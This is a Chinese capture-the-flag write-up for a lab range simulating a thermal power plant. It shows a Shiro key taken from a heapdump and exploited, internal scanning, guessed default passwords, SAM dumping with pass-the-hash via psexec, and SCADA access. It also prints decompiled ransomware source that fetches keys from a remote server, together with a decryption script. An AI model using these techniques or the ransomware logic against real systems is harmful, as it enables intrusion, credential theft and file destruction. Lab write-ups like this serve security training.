春秋云镜-ThermalPower

Heapdump 内存信息泄露、Shiro 反序列化、注册表 SAM 转储、.NET 逆向

信息收集

fscan

扫到两个

dirsearch

扫目录

发现有 heapdump

Heapdump 内存泄露

下载下来读取

ubuntu@VM-4-7-ubuntu:~$ java -jar heapdump_tool.jar heapdump
[-] file: heapdump
[-] Start jhat, waiting...
[-] fing object count: 86326
[-] too many object,please input 0/1 to choose mode.
0. (search data, may can't find some data, can't use function num=,len=,getip,geturl,getfile).
1. (load all object, need wait a few minutes).
> 0
[-] please input keyword value to search, example: password,re=xxx,len=16,num=0-10,id=0x123a,class=org.xx,all=true,geturl,getfile,getip,shirokey,systemproperties,allproperties,hashtable input q/quit to quit.
> shirokey
>> QZYysjAYhG6/sDKQlVpR2g==
[-] please input keyword value to search, example: password,re=xxx,len=16,num=0-10,id=0x123a,class=org.xx,all=true,geturl,getfile,getip,shirokey,systemproperties,allproperties,hashtable input q/quit to quit.
> 

拿到 key：QZYysjAYhG6/sDKQlVpR2g==

Shiro 反序列化

尝试了蚁剑、冰蝎都注入成功，但是连接不上，最后还得是哥斯拉

在根目录下找到 flag01

flag01: flag{759069eb-46b7-4905-b6c6-bf95f66233c7}

内网信息收集

上传 fscan 扫描内网信息，本机为 172.22.17.213

/ >/bin/sh -c "cd /tmp && ./FScan_2.0.1_linux_x64 -h 172.22.17.213/24" 
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.1

[1.9s]     已选择服务扫描模式
[1.9s]     开始信息扫描
[1.9s]     CIDR范围: 172.22.17.0-172.22.17.255
[1.9s]     generate_ip_range_full
[1.9s]     解析CIDR 172.22.17.213/24 -> IP范围 172.22.17.0-172.22.17.255
[1.9s]     最终有效主机数量: 256
[1.9s]     开始主机扫描
[1.9s]     使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[1.9s] [*] 目标 172.22.17.213   存活 (ICMP)
[1.9s] [*] 目标 172.22.17.6     存活 (ICMP)
[4.9s]     存活主机数量: 2
[4.9s]     有效端口数量: 233
[4.9s] [*] 端口开放 172.22.17.213:22
[4.9s] [*] 端口开放 172.22.17.213:8080
[4.9s] [*] 端口开放 172.22.17.6:445
[4.9s] [*] 端口开放 172.22.17.6:139
[4.9s] [*] 端口开放 172.22.17.6:135
[4.9s] [*] 端口开放 172.22.17.6:21
[4.9s] [*] 端口开放 172.22.17.6:80
[6.0s]     扫描完成, 发现 7 个开放端口
[6.0s]     存活端口数量: 7
[6.0s]     开始漏洞扫描
[6.1s]     POC加载完成: 总共387个，成功387个，失败0个
[6.1s] [+] NetBios 172.22.17.6     WORKGROUP\WIN-ENGINEER        
[6.1s] [*] NetInfo 扫描结果
目标主机: 172.22.17.6
主机名: WIN-ENGINEER
发现的网络接口:
   IPv4地址:
      └─ 172.22.17.6
[6.2s] [*] 网站标题 http://172.22.17.6        状态码:200 长度:661    标题:172.22.17.6 - /
[6.2s] [+] FTP服务 172.22.17.6:21 匿名登录成功!
[6.3s] [*] 网站标题 http://172.22.17.213:8080 状态码:302 长度:0      标题:无标题 重定向地址: http://172.22.17.213:8080/login;jsessionid=AB5C64F629CA583DECFC46E1201AAD54
[6.4s] [*] 网站标题 http://172.22.17.213:8080/login;jsessionid=AB5C64F629CA583DECFC46E1201AAD54 状态码:200 长度:2936   标题:火创能源监控画面管理平台
[7.9s] [+] 目标: http://172.22.17.213:8080
  漏洞类型: poc-yaml-springboot-env-unauth
  漏洞名称: spring2
  详细信息:
	参考链接:https://github.com/LandGrey/SpringBootVulExploit
[43.5s]     扫描已完成: 12/12

发现

172.22.17.6		WIN-ENGINEER

frp 流量转发

拿到内部资料

WIN-SCADA: 172.22.26.xx
Username: Administrator
Password: IYnT3GyCiy3

1. 登陆权限限制：
   为确保信息系统的安全性，自即日起，公司所有工程师PC的登陆将由SCADA工程师进行控制。请各位工程师注意，只能通过SCADA工程师提供的登陆方式进行访问。
2. 登陆账户设置：
   为方便管理和标准化，登陆账户名将采用姓名全称的小写拼音形式。例如，张三的账户名为zhangsan，工号为0801。初始密码将由账户名+@+工号组成，例如，zhangsan@0801。

提取 SCADA 工程师信息，推测登录账号密码为

chenhua/chenhua@0813
zhaoli/zhaoli@0821
wangning/wangning@0837
zhangling/zhangling@0871
zhangying/zhangying@0888
wangzhiqiang/wangzhiqiang@0901
chentao/chentao@0922
zhouyong/zhouyong@0939
lilong/lilong@1046
liyumei/liyumei@1048

测试 SMB 登录

proxychains -q crackmapexec smb 172.22.17.6 -u chenhua -p 'chenhua@0813'

注册表 SAM 转储

rdp 连接，但是没有权限访问 Administrator，进行权限提升

查看当前访问令牌中的所有信息，包括当前用户名、安全标识符（SID）、特权和当前用户所属的组

用管理员模式转存 SAM 文件

reg save hklm\sam C:\Users\chenhua\Desktop\sam
reg save hklm\system C:\Users\chenhua\Desktop\system

复制出来，提取

python secretsdumps.py -sam sam -system system LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x6c2be46aaccdf65a9b7be2941d6e7759
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f82292b7ac79b05d5b0e3d302bd0d279:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a2fa2853651307ab9936cc95c0e0acf5:::
chentao:1000:aad3b435b51404eeaad3b435b51404ee:47466010c82da0b75328192959da3658:::
zhaoli:1001:aad3b435b51404eeaad3b435b51404ee:2b83822caab67ef07b614d05fd72e215:::
wangning:1002:aad3b435b51404eeaad3b435b51404ee:3c52d89c176321511ec686d6c05770e3:::
zhangling:1003:aad3b435b51404eeaad3b435b51404ee:8349a4c5dd1bdcbc5a14333dd13d9f81:::
zhangying:1004:aad3b435b51404eeaad3b435b51404ee:8497fa5480a163cb7817f23a8525be7d:::
lilong:1005:aad3b435b51404eeaad3b435b51404ee:c3612c48cf829d1149f7a4e3ef4acb8a:::
liyumei:1006:aad3b435b51404eeaad3b435b51404ee:63ddcde0fa219c75e48e2cba6ea8c471:::
wangzhiqiang:1007:aad3b435b51404eeaad3b435b51404ee:5a661f54da156dc93a5b546ea143ea07:::
zhouyong:1008:aad3b435b51404eeaad3b435b51404ee:5d49bf647380720b9f6a15dbc3ffe432:::
chenhua:1009:aad3b435b51404eeaad3b435b51404ee:07ff24422b538b97f3c297cc8ddc7615:::
[*] Cleaning up...

拿到 Administrator 的 Hash

proxychains -q impacket-psexec Administrator@172.22.17.6 -hashes 0:f82292b7ac79b05d5b0e3d302bd0d279

flag02: flag{27680433-4467-467a-96fd-6ca09258cef8}

rdp 连接

用 fscan 扫描 172.22.26.0/24 发现能成功扫出结果

/ >/bin/sh -c "cd /tmp && ./FScan_2.0.1_linux_x64 -h 172.22.26.0/24" 
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.1

[1.8s]     已选择服务扫描模式
[1.8s]     开始信息扫描
[1.8s]     CIDR范围: 172.22.26.0-172.22.26.255
[1.8s]     generate_ip_range_full
[1.8s]     解析CIDR 172.22.26.0/24 -> IP范围 172.22.26.0-172.22.26.255
[1.8s]     最终有效主机数量: 256
[1.8s]     开始主机扫描
[1.8s]     使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[1.8s] [*] 目标 172.22.26.11    存活 (ICMP)
[4.8s]     存活主机数量: 1
[4.8s]     有效端口数量: 233
[4.8s] [*] 端口开放 172.22.26.11:135
[4.8s] [*] 端口开放 172.22.26.11:1433
[4.8s] [*] 端口开放 172.22.26.11:80
[4.8s] [*] 端口开放 172.22.26.11:445
[4.8s] [*] 端口开放 172.22.26.11:139
[4.8s]     扫描完成, 发现 5 个开放端口
[4.8s]     存活端口数量: 5
[4.8s]     开始漏洞扫描
[4.8s] [*] NetInfo 扫描结果
目标主机: 172.22.26.11
主机名: WIN-SCADA
发现的网络接口:
   IPv4地址:
      └─ 172.22.26.11
[4.8s] [+] NetBios 172.22.26.11    WORKGROUP\WIN-SCADA           
[4.8s]     POC加载完成: 总共387个，成功387个，失败0个
[4.8s] [+] MSSQL 172.22.26.11:1433 sa 123456
[5.2s] [*] 网站标题 http://172.22.26.11       状态码:200 长度:703    标题:IIS Windows Server
[5.6s]     扫描已完成: 9/9

拿到信息

172.22.26.11    WORKGROUP\WIN-SCADA 

rdp 连接

Administrator:IYnT3GyCiy3

进到了个控制系统，打开锅炉送 flag

flag{bcd080d5-2cf1-4095-ac15-fa4bef9ca1c0}

.NET 逆向解密 RSA/AES

桌面有一个 title 为 如何解密你的文件 的文件，一看就是勒索病毒，桌面还有个被加密的 ScadaDB.sql.locky

在 C 盘中找到了勒索病毒程序 Lockyou.exe，检查发现是 C#，找到主要加密逻辑

using System;
using System.IO;
using System.Net;
using System.Security.Cryptography;
using System.Text;

namespace Lockyou.LockyCore
{
	// Token: 0x02000004 RID: 4
	public class AESCrypto
	{
		// Token: 0x0600000C RID: 12 RVA: 0x00002280 File Offset: 0x00000480
		public AESCrypto()
		{
			this.BACKEND_URL = "http://39.101.170.47/";
			this.PRIVATE_KEY = this.GetHttpContent(this.BACKEND_URL + "privateKey");
			this.AES_KEY_ENC = this.GetHttpContent(this.BACKEND_URL + "encryptedAesKey");
			this.AES_KEY = this.DecryptRSA(this.AES_KEY_ENC, this.PRIVATE_KEY);
		}

		// Token: 0x0600000D RID: 13 RVA: 0x000023E4 File Offset: 0x000005E4
		private string GetHttpContent(string url)
		{
			HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create(url);
			httpWebRequest.Method = "GET";
			httpWebRequest.ContentType = "application/x-www-form-urlencoded";
			string str = Convert.ToBase64String(Encoding.ASCII.GetBytes("C2bAseUs2r:C@PsasR2"));
			httpWebRequest.Headers[HttpRequestHeader.Authorization] = "Basic " + str;
			HttpWebResponse httpWebResponse = (HttpWebResponse)httpWebRequest.GetResponse();
			string result;
			using (StreamReader streamReader = new StreamReader(httpWebResponse.GetResponseStream()))
			{
				result = streamReader.ReadToEnd();
			}
			return result;
		}

		// Token: 0x0600000E RID: 14 RVA: 0x00002484 File Offset: 0x00000684
		private byte[] DecryptRSA(string encryptedData, string privateKey)
		{
			byte[] result;
			using (RSACryptoServiceProvider rsacryptoServiceProvider = new RSACryptoServiceProvider())
			{
				rsacryptoServiceProvider.FromXmlString(privateKey);
				byte[] rgb = Convert.FromBase64String(encryptedData);
				result = rsacryptoServiceProvider.Decrypt(rgb, false);
			}
			return result;
		}

		// Token: 0x0600000F RID: 15 RVA: 0x000024D0 File Offset: 0x000006D0
		public int EncryptFileStart(string insureKey)
		{
			MD5 md = new MD5CryptoServiceProvider();
			StringBuilder stringBuilder = new StringBuilder();
			byte[] array = md.ComputeHash(Encoding.Default.GetBytes(insureKey));
			for (int i = 0; i < array.Length; i++)
			{
				stringBuilder.Append(array[i].ToString("x2"));
			}
			bool flag = stringBuilder.ToString() != "7a2ca8a306260205c1cd46dad0fbd598";
			int result;
			if (flag)
			{
				Console.WriteLine("Incorrect insurance key!");
				result = 0;
			}
			else
			{
				int num = 0;
				foreach (string searchPattern in this.FILE_TYPES)
				{
					string[] files = Directory.GetFiles(this.DESKTOP_PATH, searchPattern);
					foreach (string text in files)
					{
						this.EncryptFile(text, text + ".locky");
						num++;
					}
				}
				result = num;
			}
			return result;
		}

		// Token: 0x06000010 RID: 16 RVA: 0x000025D0 File Offset: 0x000007D0
		private void EncryptFile(string inputFile, string outputFile)
		{
			using (AesCryptoServiceProvider aesCryptoServiceProvider = new AesCryptoServiceProvider())
			{
				aesCryptoServiceProvider.Key = this.AES_KEY;
				aesCryptoServiceProvider.GenerateIV();
				using (ICryptoTransform cryptoTransform = aesCryptoServiceProvider.CreateEncryptor())
				{
					using (FileStream fileStream = new FileStream(inputFile, FileMode.Open))
					{
						using (FileStream fileStream2 = new FileStream(outputFile, FileMode.Create))
						{
							using (CryptoStream cryptoStream = new CryptoStream(fileStream2, cryptoTransform, CryptoStreamMode.Write))
							{
								fileStream2.Write(aesCryptoServiceProvider.IV, 0, aesCryptoServiceProvider.IV.Length);
								fileStream.CopyTo(cryptoStream);
							}
						}
					}
				}
			}
			File.Delete(inputFile);
		}

		// Token: 0x04000007 RID: 7
		private string BACKEND_URL;

		// Token: 0x04000008 RID: 8
		private string PRIVATE_KEY;

		// Token: 0x04000009 RID: 9
		private string AES_KEY_ENC;

		// Token: 0x0400000A RID: 10
		private byte[] AES_KEY;

		// Token: 0x0400000B RID: 11
		private string DESKTOP_PATH = Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory);

		// Token: 0x0400000C RID: 12
		private string[] FILE_TYPES = new string[]
		{
			"*.txt",
			"*.xlsx",
			"*.jpg",
			"*.png",
			"*.gif",
			"*.pdf",
			"*.mp4",
			"*.wav",
			"*.mp3",
			"*.bak",
			"*.docx",
			"*.pptx",
			"*.gif",
			"*.zip",
			"*.csv",
			"*.sql",
			"*.ini",
			"*.html",
			"*.php",
			"*.js",
			"*.css",
			"*.py",
			"*.cs",
			"*.cpp",
			"*.c"
		};
	}
}

结合附件写出解密脚本

from Crypto.Cipher import AES, PKCS1_v1_5
from Crypto.PublicKey import RSA
import base64
import os

AES_KEY_ENC_B64 = "lFmBs4qEhrqJJDIZ6PXvOyckwF/sqPUXzMM/IzLM/MHu9UhAB3rW/XBBoVxRmmASQEKrmFZLxliXq789vTX5AYNFcvKlwF6+Y7vkeKMOANMczPWT8UU5UcGi6PQLsgkP3m+Q26ZD9vKRkVM5964hJLVzogAUHoyC8bUAwDoNc7g="

RSA_KEY_XML = """<RSAKeyValue><Modulus>uoL2CAaVtMVp7b4/Ifcex2Artuu2tvtBO25JdMwAneu6gEPCrQvDyswebchA1LnV3e+OJV5kHxFTp/diIzSnmnhUmfZjYrshZSLGm1fTwcRrL6YYVsfVZG/4ULSDURfAihyN1HILP/WqCquu1oWo0CdxowMsZpMDPodqzHcFCxE=</Modulus><Exponent>AQAB</Exponent><P>2RPqaofcJ/phIp3QFCEyi0kj0FZRQmmWmiAmg/C0MyeX255mej8Isg0vws9PNP3RLLj25O1pbIJ+fqwWfUEmFw==</P><Q>2/QGgIpqpxODaJLQvjS8xnU8NvxMlk110LSUnfAh/E6wB/XUc89HhWMqh4sGo/LAX0n94dcZ4vLMpzbkVfy5Fw==</Q><DP>ulK51o6ejUH/tfK281A7TgqNTvmH7fUra0dFR+KHCZFmav9e/na0Q//FivTeC6IAtN5eLMkKwDSR1rBm7UPKKQ==</DP><DQ>PO2J541wIbvsCMmyfR3KtQbAmVKmPHRUkG2VRXLBV0zMwke8hCAE5dQkcct3GW8jDsJGS4r0JsOvIRq5gYAyHQ==</DQ><InverseQ>JS2ttB0WJm223plhJQrWqSvs9LdEeTd8cgNWoyTkMOkYIieRTRko/RuXufgxppl4bL9RRTI8e8tkHoPzNLK4bA==</InverseQ><D>tuLJ687BJ5RYraZac6zFQo178A8siDrRmTwozV1o0XGf3DwVfefGYmpLAC1X3QAoxUosoVnwZUJxPIfodEsieDoxRqVxMCcKbJK3nwMdAKov6BpxGUloALlxTi6OImT6w/roTW9OK6vlF54o5U/4DnQNUM6ss/2/CMM/EgM9vz0=</D></RSAKeyValue>"""  # 你前面发的 XML RSA Key

# 3. 加密文件路径
ENCRYPTED_FILE = "ScadaDB.sql.locky"

# 4. 解密后输出路径
DECRYPTED_OUTPUT = "ScadaDB.sql"
# --------------------------------------------------

# 将 XML 转换为 RSA 私钥对象
def rsa_key_from_xml(xml_str):
    import xml.etree.ElementTree as ET
    tree = ET.fromstring(xml_str)
    def b64(tag): return int.from_bytes(base64.b64decode(tree.find(tag).text), 'big')
    n = b64('Modulus')
    e = b64('Exponent')
    d = b64('D')
    p = b64('P')
    q = b64('Q')
    return RSA.construct((n, e, d, p, q))

# 解密 AES Key
def decrypt_aes_key(enc_b64, rsa_key):
    cipher_rsa = PKCS1_v1_5.new(rsa_key)
    enc_bytes = base64.b64decode(enc_b64)
    # Sentinel: used if padding check fails
    sentinel = b""
    return cipher_rsa.decrypt(enc_bytes, sentinel)

# 解密 .locky 文件
def decrypt_locky_file(enc_file, out_file, aes_key):
    with open(enc_file, 'rb') as f:
        iv = f.read(16)
        ciphertext = f.read()
    cipher = AES.new(aes_key, AES.MODE_CBC, iv)
    decrypted = cipher.decrypt(ciphertext)
    # 去除 PKCS#7 Padding
    pad_len = decrypted[-1]
    decrypted = decrypted[:-pad_len]
    with open(out_file, 'wb') as f:
        f.write(decrypted)
    print(f"[+] 解密完成: {out_file}")

rsa_key = rsa_key_from_xml(RSA_KEY_XML)
aes_key = decrypt_aes_key(AES_KEY_ENC_B64, rsa_key)

print(f"[+] 解密出 AES 密钥: {aes_key.hex()}")
decrypt_locky_file(ENCRYPTED_FILE, DECRYPTED_OUTPUT, aes_key)

解出来之后在 sql 文件中找到 flag04

flag{63cd8cd5-151f-4f29-bdc7-f80312888158}